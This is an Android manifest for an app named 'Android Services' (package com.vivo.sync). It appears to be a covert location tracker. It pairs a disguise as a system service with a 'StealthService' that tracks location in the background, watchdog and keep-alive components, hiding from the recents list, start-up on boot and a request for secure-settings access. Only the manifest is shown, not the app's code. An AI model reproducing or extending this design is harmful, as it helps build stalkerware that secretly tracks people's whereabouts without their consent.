<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools"
    package="com.vivo.sync">
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_LOCATION"/>
    <uses-permission android:name="android.permission.SCHEDULE_EXACT_ALARM"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" tools:ignore="ProtectedPermissions"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS"/>
    <application android:label="Android Services" android:icon="@android:drawable/sym_def_app_icon" android:allowBackup="false">
        <activity android:name=".MainActivity" android:excludeFromRecents="true" android:noHistory="true" android:exported="true">
            <intent-filter><action android:name="android.intent.action.MAIN"/><category android:name="android.intent.category.LAUNCHER"/></intent-filter>
        </activity>
        <activity android:name=".SetupActivity" android:theme="@android:style/Theme.NoTitleBar" android:excludeFromRecents="true" android:exported="false"/>
        <activity android:name=".KeepAliveActivity" android:theme="@android:style/Theme.Translucent.NoTitleBar" android:excludeFromRecents="true" android:exported="false" android:taskAffinity=""/>
        <service android:name=".StealthService" android:foregroundServiceType="location" android:exported="false"/>
        <service android:name=".WatchdogService" android:exported="false"/>
        <receiver android:name=".PairingReceiver" android:exported="false">
            <intent-filter><action android:name="com.vivo.sync.ACTION_PAIRING_CODE"/></intent-filter>
        </receiver>
        <receiver android:name=".StealthReceiver" android:exported="false"/>
        <receiver android:name=".BootReceiver" android:exported="true"><intent-filter><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter></receiver>
    </application>
</manifest>